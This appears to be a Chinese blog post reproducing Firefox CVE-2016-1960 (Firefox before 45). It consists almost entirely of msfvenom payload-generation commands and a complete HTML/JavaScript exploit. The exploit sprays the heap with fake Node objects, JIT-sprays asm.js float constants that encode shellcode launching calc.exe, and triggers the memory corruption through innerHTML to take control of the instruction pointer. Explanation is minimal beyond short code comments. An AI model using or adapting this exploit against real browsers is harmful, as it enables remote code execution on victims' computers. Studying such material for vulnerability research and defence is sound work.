Firefox CVE-2016-1960 复现

First Post:

Last Update:

Word Count:
595

Read Time:
3 min

FIREFOX-CVE-2016-1960

Tools

shellcode2asmjs

metasploit

payload

受影响firefox

1
Mozilla Firefox < 45
1
2
msfvenom --payload windows/exec CMD=calc.exe 
sc2asmjs.py

make payload

1
msfvenom --payload windows/exec CMD=notepad.exe EXITFUNC=seh -f python -o msf_windows_exec_notepad.py

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"
 
var Exploit = function(){
    this.asmjs = new Asmjs()
    this.heap = new Heap()
}
 
Exploit.prototype.go = function(){
    /* target address of fake node object */
    var node_target_addr = 0x20200000 
 
    /* target address of asm.js float pool payload*/
    var target_eip = 0x3c3c1dc8
 
    /* spray fake Node objects */
    this.heap.spray(node_target_addr, target_eip)
 
    /* spray asm.js float constant pools */
    this.asmjs.spray_float_payload(0x1800)
 
    /* go! */
    this.trigger_vuln(node_target_addr)
};
 
 
Exploit.prototype.trigger_vuln = function(node_ptr){
    document.body.innerHTML = '<table><svg><div id="AAAA">'
    this.heap.gc()
    var a = new Array() 
    for (var i=0; i < 0x11000; i++){
        /* array element (Node object ptr) control with integer underflow */
        a[i] = new Uint32Array(0x100/4)
        for (var j=0; j<0x100/4; j++)
            a[i][j] = node_ptr 
    }
 
    /* original crashing testcase
    document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
    */
 
    /* easier to exploit codepath */
    document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';
 
    window.location.reload()
};
 
 
var Asmjs = function(){};
 
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
    "use asm"
    var foo = ffi.foo
    function payload(){
        var val = 0.0
        /* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
        val = +foo(
            // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
            -1.587865768352248e-263,
            -8.692422460804815e-255,
            7.529882109376901e-114,
            2.0120602207293977e-16,
            3.7204662687249914e-242,
            4.351158092040946e+89,
            2.284741716118451e+270,
            7.620699014501263e-153,
            5.996021286047645e+44,
            -5.981935902612295e-92,
            6.23540918304361e+259,
            1.9227873281657598e+256,
            2.0672493951546363e+187,
            -6.971032919585734e+91,
            5.651413300798281e-134,
            -1.9040061366251406e+305,
            -1.2687640718807038e-241,
            9.697849844423e-310,
            -2.0571400761625145e+306,
            -1.1777948610587587e-123,
            2.708909852013898e+289,
            3.591750823735296e+37,
            -1.7960516725035723e+106,
            6.326776523166028e+180
        )
        return +val;
    }
    return payload
};
 
Asmjs.prototype.spray_float_payload = function(regions){
    this.modules = new Array(regions).fill(null).map(
        region => this.asm_js_module(window, {foo: () => 0})
    )
};
 
var Heap = function(target_addr, eip){
    this.node_heap = []
};
 
 
Heap.prototype.spray = function(node_target_addr, target_eip){
    var junk = 0x13371337
    var current_address = 0x08000000
    var block_size = 0x1000000
    while(current_address < node_target_addr){
        var fake_objects = new Uint32Array(block_size/4 - 0x100)
        for (var offset = 0; offset < block_size; offset += 0x100000){
            /* target Node object needed to control EIP  */
            fake_objects[offset/4 + 0x00/4] = 0x29 
            fake_objects[offset/4 + 0x0c/4] = 3
            fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
            fake_objects[offset/4 + 0x18/4] = 1
            fake_objects[offset/4 + 0x1c/4] = junk
            fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
            fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
            fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
            fake_objects[offset/4 + 0x2c/4] = target_eip 
        }
        this.node_heap.push(fake_objects)
        current_address += block_size
    }
};
 
Heap.prototype.gc = function(){
    for (var i=0; i<=10; i++)
        var x = new ArrayBuffer(0x1000000)
};
 
</script>
<head>
<body onload='exploit = new Exploit(); exploit.go()' />
打赏点小钱
支付宝 | Alipay
微信 | WeChat